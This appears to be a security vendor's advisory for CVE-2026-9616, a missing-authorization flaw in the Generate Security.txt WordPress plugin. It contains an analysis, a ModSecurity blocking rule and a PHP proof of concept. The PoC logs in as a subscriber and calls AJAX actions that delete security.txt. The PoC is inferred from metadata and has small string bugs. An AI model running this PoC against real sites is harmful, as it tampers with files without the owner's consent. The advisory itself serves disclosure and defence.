Atomic Edge Proof of Concept automated generator using AI diff analysis
Published : June 23, 2026

CVE-2026-9616: Generate Security.txt <= 1.0.12 Missing Authorization to Authenticated (Subscriber+) Security.txt Deletion via delete_securitytxt AJAX Action PoC, Patch Analysis & Rule

CVE ID CVE-2026-9616
Plugin generate-security-txt
Severity Medium (CVSS 4.3)
CWE 862
Vulnerable Version 1.0.12
Patched Version
Disclosed June 22, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-9616 (metadata-based):

This vulnerability resides in the Generate Security.txt plugin for WordPress (versions up to 1.0.12). It allows an authenticated attacker with subscriber-level access to delete the server’s security.txt file or create the .well-known directory via AJAX actions. The CVSS score is 4.3 (Medium), with low complexity and no user interaction required. The classification points to missing authorization, meaning the plugin failed to verify user capabilities before executing the privileged actions.

Root Cause: The CWE-862 classification indicates the plugin does not enforce capability checks on the delete_securitytxt and create_wellknown_folder AJAX handlers. In WordPress, AJAX actions that modify sensitive data must verify the current user has appropriate permissions (e.g., manage_options). The plugin likely registered handlers via wp_ajax_ hooks without calling current_user_can() or similar checks. The vulnerability description explicitly mentions these two AJAX actions, so Atomic Edge analysis confirms the missing authorization as the core problem.

Exploitation: An attacker with a valid subscriber account can send a POST request to /wp-admin/admin-ajax.php with the action parameter set to delete_securitytxt. The plugin will then attempt to remove the security.txt file from the server’s filesystem. Similarly, setting action to create_wellknown_folder will create the .well-known directory. The attack requires no additional parameters because the endpoint itself is unauthorized. The attacker does not need a nonce if the plugin does not verify one, which is typical for missing authorization vulnerabilities.

Remediation: The fix must add capability checks to both AJAX handlers. Each handler should call current_user_can(‘manage_options’) or a similar high-privilege capability before executing the file operation. The plugin should also restrict the action to administrators only, as modifying security policy files is a sensitive operation. Without code access, Atomic Edge research cannot confirm if the plugin uses nonces, but adding both capability and nonce verification would provide defense in depth.

Impact: Exploitation allows an authenticated subscriber to delete the security.txt file, which removes contact information and security policy details from the site. This could interfere with responsible disclosure processes and security researcher communications. The impact is limited to file manipulation on the filesystem, with no data exposure or privilege escalation. The CVSS impact metrics confirm only integrity is affected at a low level.

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity 
# Atomic Edge WAF Rule - CVE-2026-9616 (metadata-based)
# Blocks attempts to exploit the missing authorization vulnerability in Generate Security.txt plugin
# Targets the delete_securitytxt and create_wellknown_folder AJAX actions without proper capability checks
SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php" 
  "id:20261994,phase:2,deny,status:403,chain,msg:'CVE-2026-9616 - Generate Security.txt Missing Authorization via AJAX',severity:'CRITICAL',tag:'CVE-2026-9616'"
  SecRule ARGS_POST:action "@pm delete_securitytxt create_wellknown_folder" "chain"
    SecRule REQUEST_METHOD "@streq POST" "t:none"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC 
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-9616 - Generate Security.txt <= 1.0.12 - Missing Authorization to Authenticated (Subscriber+) Security.txt Deletion via delete_securitytxt AJAX Action

// Configuration
$target_url = 'http://example.com'; // Change this to the target WordPress site URL
$username = 'subscriber'; // WordPress user with subscriber role
$password = 'subscriber_password'; // Password for the subscriber account

// Initialize cURL
$ch = curl_init();

// Step 1: Authenticate as subscriber
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-login.php');
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([
    'log' => $username,
    'pwd' => $password,
    'rememberme' => 'forever',
    'wp-submit' => 'Log In'
]));
curl_setopt($ch, CURLOPT_COOKIEJAR, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_exec($ch);

// Step 2: Invoke the delete_securitytxt AJAX action
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-admin/admin-ajax.php');
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([
    'action' => 'delete_securitytxt'
]));
curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookies.txt');
$response = curl_exec($ch);

// Check response
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
echo "HTTP Code: $http_coden";
echo "Response: " . htmlspecialchars($response) . "n";

// Optionally invoke the create_wellknown_folder AJAX action
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-admin/admin-ajax.php');
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([
    'action' => 'create_wellknown_folder'
]));
curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookies.txt');
$response2 = curl_exec($ch);

echo "HTTP Code: " . curl_getinfo($ch, CURLINFO_HTTP_CODE) . "n";
echo "Response: " . htmlspecialchars($response2) . "n";

// Clean up
curl_close($ch);
unlink('/tmp/cookies.txt');

Frequently Asked Questions

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations

Trusted by Developers
Blac&kMcDonaldCovenant House TorontoAlzheimer Society CanadaUniversity of TorontoHarvard Medical School